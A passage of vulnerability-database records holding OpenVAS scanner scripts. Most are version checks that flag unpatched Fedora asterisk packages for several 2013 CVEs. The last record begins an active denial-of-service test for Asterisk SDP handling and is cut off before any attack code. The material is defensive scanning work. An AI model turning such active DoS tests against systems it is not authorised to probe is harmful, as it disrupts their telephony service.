"cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865273", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865273", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-1003\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"asterisk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097760.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865273\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:25:06 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-1003\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-1003\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 
2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.2.0~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:28", "description": "The remote host is missing an update for the 'asterisk' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-0992", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865264", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865264", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-0992\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097815.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865264\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:41 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2013-0992\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-0992\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if 
((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~1.8.20.0~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:18", "description": "The remote host is missing an update for the 'asterisk' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-0994", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865254", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-0994\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097762.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865254\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:23 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2013-0994\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-0994\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if 
((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~10.12.0~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-01-23T13:10:25", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-0994", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2018-01-23T00:00:00", "id": "OPENVAS:865254", "href": "http://plugins.openvas.org/nasl.php?oid=865254", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-0994\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Fedora 17\";\ntag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\n all of the features you would expect from a PBX and more. 
Asterisk\n does voice over IP in three protocols, and can interoperate with\n almost all standards-based telephony equipment using relatively\n inexpensive hardware.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097762.html\");\n script_id(865254);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:23 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2013-0994\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-0994\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~10.12.0~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 
5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:09:41", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-1003", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2018-01-18T00:00:00", "id": "OPENVAS:865273", "href": "http://plugins.openvas.org/nasl.php?oid=865273", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-1003\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_solution = \"Please Install the Updated Packages.\";\ntag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\n all of the features you would expect from a PBX and more. 
Asterisk\n does voice over IP in three protocols, and can interoperate with\n almost all standards-based telephony equipment using relatively\n inexpensive hardware.\";\ntag_affected = \"asterisk on Fedora 18\";\n\n\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097760.html\");\n script_id(865273);\n script_version(\"$Revision: 8456 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 07:58:40 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:25:06 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-1003\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-1003\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.2.0~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:09:11", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-0992", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2018-01-17T00:00:00", "id": "OPENVAS:865264", "href": "http://plugins.openvas.org/nasl.php?oid=865264", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-0992\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Fedora 16\";\ntag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\n all of the features you would expect from a PBX and more. 
Asterisk\n does voice over IP in three protocols, and can interoperate with\n almost all standards-based telephony equipment using relatively\n inexpensive hardware.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097815.html\");\n script_id(865264);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:41 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2013-0992\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-0992\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~1.8.20.0~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 
5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-26T11:10:29", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-4528", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2264", "CVE-2013-2686"], "modified": "2018-01-26T00:00:00", "id": "OPENVAS:865538", "href": "http://plugins.openvas.org/nasl.php?oid=865538", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-4528\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Fedora 17\";\ntag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\n all of the features you would expect from a PBX and more. 
Asterisk\n does voice over IP in three protocols, and can interoperate with\n almost all standards-based telephony equipment using relatively\n inexpensive hardware.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(865538);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-08 10:33:25 +0530 (Mon, 08 Apr 2013)\");\n script_cve_id(\"CVE-2013-2686\", \"CVE-2013-2264\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-4528\");\n\n script_xref(name: \"FEDORA\", value: \"2013-4528\");\n script_xref(name: \"URL\" , value: \"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101684.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~10.12.2~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, 
"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:08", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-4528", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2264", "CVE-2013-2686"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865538", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865538", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-4528\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.865538\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-08 10:33:25 +0530 (Mon, 08 Apr 2013)\");\n script_cve_id(\"CVE-2013-2686\", \"CVE-2013-2264\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-4528\");\n script_xref(name:\"FEDORA\", value:\"2013-4528\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101684.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if 
((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~10.12.2~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:21", "description": "This host is running Asterisk Server and is prone to denial of service\n vulnerability.", "cvss3": {}, "published": "2013-10-28T00:00:00", "type": "openvas", "title": "Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5642"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310802063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802063", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_asterisk_invalid_sdp_dos_vuln.nasl 13994 2019-03-05 12:23:37Z cfischer $\n#\n# Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability\n#\n# Authors:\n# Veerendra G.G <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:digium:asterisk\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802063\");\n script_version(\"$Revision: 13994 $\");\n script_cve_id(\"CVE-2013-5642\");\n script_bugtraq_id(62022);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 13:23:37 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-28 15:06:58 +0530 (Mon, 28 Oct 2013)\");\n script_name(\"Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_asterisk_detect.nasl\");\n script_mandatory_keys(\"Asterisk-PBX/Installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54534\");\n script_xref(name:\"URL\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22007\");\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Asterisk Server and is prone to denial of service\n vulnerability.\");\n\n 